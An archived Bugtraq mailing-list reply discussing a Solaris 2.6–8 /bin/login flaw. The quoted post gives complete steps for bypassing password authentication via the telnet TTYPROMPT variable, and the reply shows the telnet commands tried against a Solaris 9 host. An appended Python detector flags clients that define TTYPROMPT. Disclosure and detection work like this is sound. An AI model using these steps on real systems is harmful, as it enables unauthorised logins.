[27273] in bugtraq
Re: Solaris 2.6, 7, 8
daemon@ATHENA.MIT.EDU (Ido Dubrawsky)
Thu Oct 3 16:03:04 2002
Date: Wed, 2 Oct 2002 14:16:28 -0500
From: Ido Dubrawsky <idubraws@cisco.com>
To: Jonathan S <js@APOLLO.GTI.NET>
Message-ID: <20021002191628.GB12174@cisco.com>
In-Reply-To: <Pine.BSO.4.44.0210021207060.25321-100000@eurocompton.net>
On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
> Hello,
>
> Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT. This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
> However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists. The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n". You will then be logged in as the user
> without any password authentication. This should work with any account
> except root (unless remote root login is allowed).
>
Looks like Solaris 9 is not vulnerable to this:
[idubraws@elrond idubraws]
6 $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 192.168.155.2
Trying 192.168.155.2...
Connected to 192.168.155.2.
Escape character is '^]'.
SunOS 5.9
login:
It automatically drops you to the login prompt. Perhaps this is fixed by a
patch that got rolled into 9?
Ido
--
Ido Dubrawsky                 E-mail: idubraws@cisco.com
Network Consulting Engineer
VSEC Technical Marketing, SAFE Architecture
Cisco Systems, Inc.
Austin, TX. 78759
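A detection-side view of the negotiation shown in this thread, added here as an example and not code from either poster: the `environ define` command makes the telnet client export TTYPROMPT through the NEW-ENVIRON option (RFC 1572), so a telnetd wrapper or network sensor can decode that suboption and alert whenever a client defines the variable at all, whatever the target's patch level. The sample bytes are constructed, and sending the non-standard name as USERVAR is an assumption about the client's encoding, not captured traffic.

```python
IAC, SB, SE, NEW_ENVIRON = 255, 250, 240, 39     # RFC 854 commands, RFC 1572 option
IS, SEND, INFO = 0, 1, 2                         # NEW-ENVIRON suboption commands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3            # NEW-ENVIRON type codes

def extract_suboptions(stream: bytes):
    """Yield (option, payload) for each IAC SB ... IAC SE, undoing IAC doubling."""
    i, n = 0, len(stream)
    while i + 1 < n:
        if stream[i] == IAC and stream[i + 1] == SB:
            body, i = bytearray(), i + 2
            while i + 1 < n and not (stream[i] == IAC and stream[i + 1] == SE):
                body.append(stream[i])           # a doubled IAC is one literal 0xFF
                i += 2 if stream[i] == IAC and stream[i + 1] == IAC else 1
            if i + 1 < n and body:               # skip truncated or empty suboptions
                yield body[0], bytes(body[1:])
            i += 2
        else:
            i += 1

def _read_token(buf: bytes, i: int):
    # Read a name or value up to the next type code; ESC quotes the following byte.
    out = bytearray()
    while i < len(buf) and buf[i] not in (VAR, VALUE, USERVAR):
        if buf[i] == ESC and i + 1 < len(buf):
            i += 1
        out.append(buf[i])
        i += 1
    return bytes(out), i

def parse_new_environ(payload: bytes) -> dict:
    """Return {name: value} from an IS/INFO payload; a server SEND defines nothing."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    env, i = {}, 1
    while i < len(payload):
        if payload[i] not in (VAR, USERVAR):
            raise ValueError("malformed NEW-ENVIRON at offset %d" % i)
        name, i = _read_token(payload, i + 1)
        value, i = _read_token(payload, i + 1) if i < len(payload) and payload[i] == VALUE else (b"", i)
        env[name.decode("ascii", "replace")] = value.decode("ascii", "replace")
    return env

def flag_ttyprompt(stream: bytes) -> list:
    # Detection rule: a client that defines TTYPROMPT at all is worth an alert.
    return [(k, v) for opt, p in extract_suboptions(stream) if opt == NEW_ENVIRON
            for k, v in parse_new_environ(p).items() if k.upper() == "TTYPROMPT"]

# Constructed sample: a client reply after "environ define TTYPROMPT abcdef".
SAMPLE = (bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER" + bytes([VALUE]) + b"jsmith"
          + bytes([USERVAR]) + b"TTYPROMPT" + bytes([VALUE]) + b"abcdef" + bytes([IAC, SE]))
```

`flag_ttyprompt(SAMPLE)` returns `[('TTYPROMPT', 'abcdef')]`; the parser also copes with a server-side SEND, ESC-quoted type codes and doubled IAC bytes inside the suboption.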